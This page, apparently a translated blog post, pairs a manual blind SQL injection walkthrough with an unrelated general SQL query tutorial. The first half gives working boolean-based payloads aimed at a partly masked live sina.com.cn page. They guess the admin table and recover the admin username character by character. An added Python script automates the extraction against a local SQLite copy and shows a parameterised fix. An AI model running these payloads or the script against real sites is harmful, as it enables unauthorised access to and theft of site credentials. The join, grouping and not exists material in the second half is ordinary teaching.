Access/JSP manual SQL injection (complete walkthrough)

Checking whether the parameter is injectable

http://\*\*\*\*.house.sina.com.cn/publics/detail.jsp?id=7674 and 1=1
(normal page: the appended condition is true, so the original row is still returned)

http://\*\*\*\*.house.sina.com.cn/publics/detail.jsp?id=7674 and 1=2
(error page: the condition is false, so no row comes back. A difference between the two responses means the id parameter is concatenated into the query unescaped.)

Checking whether a table exists (here the guessed table name admin)

http://\*\*\*\*.house.sina.com.cn/publics/detail.jsp?id=7674 and exists
(select * from admin)

Checking whether a column exists (here username in admin)

http://\*\*\*\*.house.sina.com.cn/publics/detail.jsp?id=7674 and exists
(select username from admin)

Checking whether a row with a given ID exists

http://\*\*\*\*.house.sina.com.cn/publics/detail.jsp?id=7674 and exists
(select id from admin where ID=1)

Checking the length of the value (here: is the username of row ID=1 five characters long?)

http://\*\*\*\*.house.sina.com.cn/publics/detail.jsp?id=7674 and exists
(select id from admin where len(username)=5 and ID=1)


Checking whether the backend is MSSQL (sysobjects is a SQL Server system table; the page loads normally on SQL Server and errors on Access)

http://\*\*\*\*.house.sina.com.cn/publics/detail.jsp?id=7674 and exists
(select * from sysobjects)

Checking whether the first character is in the ASCII (Latin) range

(Access database)

http://\*\*\*\*.house.sina.com.cn/publics/detail.jsp?id=7674 and exists
(select id from admin where asc(mid(username,1,1)) between 30 and 130
and ID=1)

(MSSQL database)

http://\*\*\*\*.house.sina.com.cn/publics/detail.jsp?id=7674 and exists
(select id from admin where unicode(substring(username,1,1)) between 30
and 130 and ID=1)

Narrowing the character's code range (keep halving the between range until one value remains)

(Access database)

http://\*\*\*\*.house.sina.com.cn/publics/detail.jsp?id=7674 and exists
(select id from admin where asc(mid(username,1,1)) between 90 and 100
and ID=1)

(MSSQL database)

http://\*\*\*\*.house.sina.com.cn/publics/detail.jsp?id=7674 and exists
(select id from admin where unicode(substring(username,1,1)) between 90
and 100 and ID=1)

Confirming the exact character (97 is 'a'; repeat with mid(username,2,1), mid(username,3,1), ... until the whole value is recovered)

(Access database)

http://\*\*\*\*.house.sina.com.cn/publics/detail.jsp?id=7674
and exists (select id from admin where asc(mid(username,1,1))=97 and
ID=1)

 

(MSSQL database)

http://\*\*\*\*.house.sina.com.cn/publics/detail.jsp?id=7674 and exists
(select id from admin where unicode(substring(username,1,1))=97 and
ID=1)
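The whole procedure above, carried through as an added example that is not part of the original page: an in-memory SQLite database stands in for the Access/MSSQL backend, one function mirrors detail.jsp's string-concatenated query, and the "narrow the between range" steps are run as a binary search over the character code. The table and column names (news, admin, id, username), the sample rows and the hardened variant are assumptions; SQLite's length(), unicode() and substr() play the roles of len()/asc()/unicode() and mid()/substring() in the page's Access and MSSQL payloads.

```python
import sqlite3

# Constructed stand-in for the site's database (assumption: the real target
# ran Access/MSSQL; SQLite is used here so the example runs offline).
conn = sqlite3.connect(":memory:")
conn.executescript("""
create table news(id integer primary key, title text);
create table admin(id integer primary key, username text, password text);
insert into news values (7674, 'Housing price report');
insert into admin values (1, 'admin', 'S3cret!');
""")


def fetch_detail_vulnerable(id_param: str):
    """Mirrors detail.jsp?id=...: the raw parameter is concatenated into SQL."""
    sql = "select title from news where id=" + id_param
    return conn.execute(sql).fetchone()


def fetch_detail_safe(id_param: str):
    """Hardened form: coerce to the expected type, then bind as a parameter."""
    try:
        id_value = int(id_param)
    except ValueError:
        return None  # reject anything that is not a plain integer id
    return conn.execute("select title from news where id=?", (id_value,)).fetchone()


def page_ok(condition: str) -> bool:
    """Boolean oracle: True when 'id=7674 and <condition>' still yields the row
    (the 'normal page' of the walkthrough), False for the 'error page'."""
    return fetch_detail_vulnerable("7674 and " + condition) is not None


def guess_username_length(max_len: int = 32) -> int:
    """Step 'checking the length': len(username)=N in Access/MSSQL, length() here."""
    for n in range(1, max_len + 1):
        if page_ok(f"exists(select id from admin where length(username)={n} and id=1)"):
            return n
    raise RuntimeError("username longer than max_len or not found")


def guess_char(pos: int, lo: int = 32, hi: int = 126) -> str:
    """Steps 'is it ASCII' / 'narrow the range' / 'confirm the character' as a
    binary search: each probe asks whether the code is between lo and mid.
    Assumes the character really is printable ASCII; otherwise the loop ends
    at hi and returns a wrong character."""
    while lo < hi:
        mid = (lo + hi) // 2
        cond = (f"exists(select id from admin where "
                f"unicode(substr(username,{pos},1)) between {lo} and {mid} and id=1)")
        if page_ok(cond):
            hi = mid          # code is in the lower half
        else:
            lo = mid + 1      # code is in the upper half
    return chr(lo)


def extract_admin_username() -> str:
    """Recover the whole username of admin row id=1, one character at a time."""
    length = guess_username_length()
    return "".join(guess_char(pos) for pos in range(1, length + 1))


if __name__ == "__main__":
    print("injectable:", page_ok("1=1") and not page_ok("1=2"))
    print("admin username:", extract_admin_username())
    print("safe variant with payload:", fetch_detail_safe("7674 and 1=1"))
```

Each character costs about seven requests with the binary search, against up to 95 with the page's one-value-at-a-time confirmation, which is why the "narrow the range" step matters in practice. The safe variant shows the fix: once the id is coerced to an integer and bound as a parameter, the same payload is simply rejected instead of changing the query.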

Commonly used functions

Access: asc(char)                 SQL Server: unicode(char)
Purpose: returns the character code of a character

Access: chr(number)               SQL Server: nchar(number)
Purpose: the inverse of asc, returns the character for a given code

Access: mid(string,N,L)           SQL Server: substring(string,N,L)
Purpose: returns the substring of length L starting at the N-th character, i.e. characters N through N+L-1

Access: abs(number)               SQL Server: abs(number)
Purpose: returns the absolute value of a number (needed when guessing Chinese characters, whose codes can come back negative)

Access: A between B and C         SQL Server: A between B and C
Purpose: tests whether A lies between B and C inclusive

and exists(Select top 1 * From 用户 order by id)
(probes the first row, ordered by id, of a table named 用户 ("users"); top N is Access/SQL Server syntax)

1. Giving a result column a display name:

a. with the as keyword: select name as '姓名' from students order by age

b. directly after the column: select name '姓名' from students order by age

2. Restricting the rows returned:

a. in, to limit to a set of values: select * from students where native in ('湖南', '四川')

b. between...and: select * from students where age between 20 and 30

c. "=": select * from students where name = '李山'

d. like: select * from students where name like '李%'
(A "%" in the condition makes this a pattern match, and the position carries meaning: '李%' matches names that start with 李. To find every name containing 李 the pattern must be '%李%'; if 李 is the second character, use '_李%', '_李' or '_李_'.)

e. [] combined with like: select * from courses where cno like '[AC]%'
(Expresses an "or" over the listed characters, much like in(...); [] can also give a range, e.g. select *
from courses where cno like '[A-C]%'. The [] wildcard is SQL Server/Access syntax, not standard SQL.)

3. Handling date columns

a. smalldatetime: compare directly against string literals, e.g.: select * from
students where birth >= '1980-1-1' and birth <= '1980-12-31'

4. Aggregate functions

a. count() counts rows, e.g.: select count(*) from students (total number of students)

b. avg(column) averages, e.g.: select avg(mark) from grades where cno='B2'

c. max(column) and min(column) give the largest and smallest value

5. Grouping with group by

Mostly used for statistics, e.g. counts per group: select gender,count(sno) from students group
by gender (number of male and female students)

Note: whichever column you want to group on goes into "group by".

For grouping on several columns, just list all the grouping rules. For example, to count the male and female students of each year and each major, the grouping columns are year (grade), major (mno) and

gender (gender), so the clause is "group by grade, mno, gender":

select grade, mno, gender, count(*) from students group by grade, mno,
gender

group by is often combined with having, e.g. students who failed more than one course, grouped by student number (sno):

select sno,count(*) from grades where mark<60 group by sno having
count(*)>1

6. UNION

Combines the results of several queries, e.g.:

Select * FROM students Where name like '张%' UNION [ALL] Select *
FROM students Where name like '李%'

7. Multi-table queries

a. Inner join

select g.sno,s.name,c.coursename from grades g JOIN students s ON
g.sno=s.sno JOIN courses c ON g.cno=c.cno

(note the use of table aliases)

b. Outer joins

b1. Left join

select courses.cno,max(coursename),count(sno) from courses LEFT JOIN
grades ON courses.cno=grades.cno group by courses.cno

Characteristic of a left join: every row of the left table is shown, even those with no matching row in the right table.

A left outer join returns the rows of the inner join plus the rows that exist in the left table but have no match in the right table.

b2. Right join

The mirror image of the left join.

b3. Full join

select sno,name,major from students FULL JOIN majors ON
students.mno=majors.mno

All rows of both tables are shown.

c. Self join

select c1.cno,c1.coursename,c1.pno,c2.coursename from courses c1,courses
c2 where c1.pno=c2.cno

Solved by giving the same table two aliases.

d. Cross join

select lastname+firstname from lastname CROSS JOIN firstname

Equivalent to the Cartesian product of the two tables.

8. Nested queries

a. With the keyword IN, e.g. find students from the same hometown as 猪猪:

select * from students where native in (select native from students
where name='猪猪')

b. With the keyword EXISTS. For example, the following two statements are equivalent:

select * from students where sno in (select sno from grades where
cno='B2')

select * from students where exists (select * from grades where
grades.sno=students.sno AND cno='B2')

9. Ordering with order by

a. Two directions: asc (ascending) and desc (descending)

b. You can order by any item of the select list, and that item may be given by its position number, e.g.:

select sno,count(*) ,avg(mark) from grades group by sno having
avg(mark)>85 order by 3

10. Other

a. Identifiers containing spaces must be enclosed in [] (SQL Server/Access syntax).

b. Rows with no value in a column are found with null tests, e.g. select sno,courseno from
grades where mark IS NULL

c. Distinguish any from all in nested queries: any behaves like logical "||", all like logical "&&".

d. Beware of the trap in queries with a negative meaning:

For example, students who did NOT take course 'B2':

select students.* from students, grades where students.sno=grades.sno
AND grades.cno <> 'B2'

The query above is wrong: a student who took B2 and any other course still appears, and a student with no grades at all is dropped. The correct form is:

select * from students where not exists (select * from grades where
grades.sno=students.sno AND cno='B2')

11. How to think about harder, doubly nested queries. Example: students who have taken every course: select * from students where
not exists (select * from courses where NOT EXISTS (select * from
grades where sno=students.sno AND cno=courses.cno))

Outermost level: select from students, excluding those for whom some course exists that they did not take, hence not
exists. Since the thing being checked is courses, the second level selects from the courses table and excludes the courses the student did take.
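As an added example that is not part of the original page, the negation trap of item 10.d and the double not exists of item 11 run against a constructed dataset (SQLite in memory; the table layout, names and marks are assumptions chosen so that each pitfall is visible). Student S1 took both courses, S2 took only A1, S3 took nothing.

```python
import sqlite3

# Constructed sample data (assumption, not the page's data): students,
# courses and grades tables as used throughout the tutorial's examples.
conn = sqlite3.connect(":memory:")
conn.executescript("""
create table students(sno text primary key, name text);
create table courses(cno text primary key, coursename text);
create table grades(sno text, cno text, mark integer);
insert into students values ('S1','Li Shan'),('S2','Zhang Wei'),('S3','Wang Fang');
insert into courses values ('A1','Databases'),('B2','Networks');
insert into grades values ('S1','A1',88),('S1','B2',75),('S2','A1',91);
""")

# Item 10.d, the wrong form: joining grades and filtering cno <> 'B2' keeps
# S1 (because of the A1 row) and silently drops S3, who has no grades.
WRONG_NOT_B2 = """
select distinct students.sno from students, grades
 where students.sno=grades.sno and grades.cno <> 'B2'
"""

# Item 10.d, the correct form: students for whom no B2 grade row exists.
RIGHT_NOT_B2 = """
select sno from students
 where not exists (select * from grades
                   where grades.sno=students.sno and cno='B2')
"""

# Item 11: students for whom no course exists that they have not taken
# (relational division expressed with two nested not exists).
TOOK_ALL_COURSES = """
select sno from students
 where not exists (select * from courses
                   where not exists (select * from grades
                                     where sno=students.sno and cno=courses.cno))
"""


def run(sql: str) -> list:
    """Return the sorted list of student numbers a query yields."""
    return sorted(row[0] for row in conn.execute(sql))


if __name__ == "__main__":
    print("wrong 'not B2':", run(WRONG_NOT_B2))
    print("right 'not B2':", run(RIGHT_NOT_B2))
    print("took every course:", run(TOOK_ALL_COURSES))
```

The wrong query answers a different question ("students who have a grade in some course other than B2"), which is why it both includes S1 and misses S3; the not exists form asks the intended one.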
